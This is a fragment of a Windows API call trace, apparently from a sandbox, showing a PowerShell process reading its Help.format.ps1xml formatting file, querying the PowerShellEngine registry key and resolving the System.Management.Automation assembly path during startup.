	[0381.760] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0381.760] GetFileType (hFile=0x330) returned 0x1
	[0381.760] SetErrorMode (uMode=0x1) returned 0x1
	[0381.760] GetFileType (hFile=0x330) returned 0x1
	[0381.760] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0381.762] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0381.762] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0381.762] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0381.763] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0381.763] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0381.763] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0381.764] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0381.764] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0381.764] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0381.765] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0381.765] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0381.765] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0381.765] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0381.766] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0381.766] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.188] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.189] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.189] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.189] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.189] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.190] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.190] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.190] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.190] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.190] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.191] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.191] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.191] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.191] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.191] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.191] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.193] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.193] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.194] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.194] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.194] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.194] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.194] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.194] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.195] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.195] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.195] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.195] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.195] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.196] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.196] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.196] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.196] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.196] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.196] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.197] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.197] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.197] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.197] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.197] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.198] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.198] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.198] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.198] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.198] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.198] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0382.198] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0xf37, lpOverlapped=0x0) returned 1
	[0382.199] ReadFile (in: hFile=0x330, lpBuffer=0x34fe7df, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34fe7df*, lpNumberOfBytesRead=0x24ce18*=0x0, lpOverlapped=0x0) returned 1
	[0382.199] ReadFile (in: hFile=0x330, lpBuffer=0x34ff140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34ff140*, lpNumberOfBytesRead=0x24ce18*=0x0, lpOverlapped=0x0) returned 1
	[0382.199] CloseHandle (hObject=0x330) returned 1
	[0382.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0382.199] SetErrorMode (uMode=0x1) returned 0x1
	[0382.199] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24cdc0 | out: lpFileInformation=0x24cdc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0382.199] SetErrorMode (uMode=0x1) returned 0x1
	[0382.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24caf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0382.199] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24cea8 | out: phkResult=0x24cea8*=0x330) returned 0x0
	[0382.199] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24ce2c, lpData=0x0, lpcbData=0x24ce28*=0x0 | out: lpType=0x24ce2c*=0x1, lpData=0x0, lpcbData=0x24ce28*=0x56) returned 0x0
	[0382.199] CoTaskMemAlloc (cb=0x5a) returned 0x171540
	[0382.199] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24cdfc, lpData=0x171540, lpcbData=0x24cdf8*=0x56 | out: lpType=0x24cdfc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24cdf8*=0x56) returned 0x0
	[0382.200] CoTaskMemFree (pv=0x171540) 
	[0382.200] RegCloseKey (hKey=0x330) returned 0x0
	[0382.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24caf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0382.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24c9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0382.208] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x4feb827f, Data2=0x5f43, Data3=0x4bc7, Data4=([0]=0xaa, [1]=0x7b, [2]=0x6b, [3]=0xa6, [4]=0x84, [5]=0x1f, [6]=0x17, [7]=0x19))) returned 0x0
	[0382.208] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x78ce5483, Data2=0x539f, Data3=0x4527, Data4=([0]=0x8f, [1]=0xd5, [2]=0x68, [3]=0xf7, [4]=0x34, [5]=0xe1, [6]=0x6e, [7]=0xa3))) returned 0x0
	[0382.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.585] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x4e3970f3, Data2=0x2723, Data3=0x4876, Data4=([0]=0xbb, [1]=0x6a, [2]=0xf7, [3]=0xe7, [4]=0xbe, [5]=0x83, [6]=0xc, [7]=0x2b))) returned 0x0
	[0382.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
